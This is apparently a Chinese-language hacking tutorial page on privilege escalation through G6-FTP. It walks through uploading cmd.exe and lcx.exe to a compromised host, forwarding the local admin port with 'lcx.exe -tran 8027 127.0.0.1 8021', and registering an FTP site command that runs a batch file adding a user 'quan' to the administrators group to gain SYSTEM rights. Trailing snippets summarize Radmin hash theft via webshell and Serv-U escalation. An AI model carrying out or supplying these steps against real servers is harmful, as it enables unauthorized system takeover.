g6-ftp的預設埠為8021,只偵聽在127.0.0.1的8021埠上,所以無法從外部直接訪問,需要進行埠**(使用lcx 工具(lcx 具有三個功能:監聽、**、埠轉向))。
使用lcx時必須保證兩個前提,肉雞a和內網機c都能夠訪問到外網機b;listen監聽的埠之前不能被其它程式占用。
1、通過執行bat檔案提權
2、通過對映bat檔案提權
步驟如下
2、查詢該**的可讀可寫目錄,然後上傳cmd.exe和lcx.exe到該目錄下
3、利用lcx埠** 預設只允許本機連線
lcx.exe -tran 8027 127.0.0.1 8021**成功後,通過g6-ftp軟體進行連線,以管理員使用者登入
5、建立ftp使用者並進行許可權設定
6、上傳批處理檔案
adduser.bat中的檔案內容為:即新建乙個使用者名為quan的使用者,並且加入到管理員組中。
net user quan quan123 /add
net localgroup administrators quan /add
site commands-> +
command:adduser
excute:
8、普通使用者登入ftp
9、執行所加入的批處理命令
執行命令quote site adduser.bat
可用性較差
步驟如下
1、以非特權使用者登入
2、通過新增ftp使用者賬戶hhh
3、對ftp伺服器新增新的site命令
4、新建a.bat檔案
net user quan quan123 /add
net localgroup administrators quan /add
6、獲取system許可權
以test使用者登入ftp伺服器,執行以下命令
ftp>quote site a
《網路攻防實戰研究——漏洞利用與提權》
Day12 提權學習之第三方軟體Radmin提權
老版本的radmin會在登錄檔中保留密碼的hash值,通過webshell 遠端掛馬讀取登錄檔中的密碼hash值並在本地破解密碼進行遠端連線來達到提權目的。1 獲取md5hash值 hkey local machinesystemradminv2.0serverparametersparameter...
第三方軟體 G6ftp提權
步驟 將administrator 2.利用lcx 埠 預設只允許本機連線 3.lcx.exe tran 8027 127.0.0.1 8021 4.使用客戶端以管理員使用者登入 5.建立使用者並許可權設定和執行批處理檔案 6.上傳批處理 7.建立普通使用者登入ftp 8.執行命令 quote si...
第三方應用軟體提權
1.serv u提權 漏洞概述 1 5.04以下版本可用servux.exe進行遠端溢位。2 許可權配置不當可用svu.exe新增管理員帳號。svu.exe i ip u 使用者 p 密碼 a 路徑 3 serv u目錄檔案存在修改許可權,直接修改配置檔案新增管理使用者。1 直接通過指令碼大馬的se...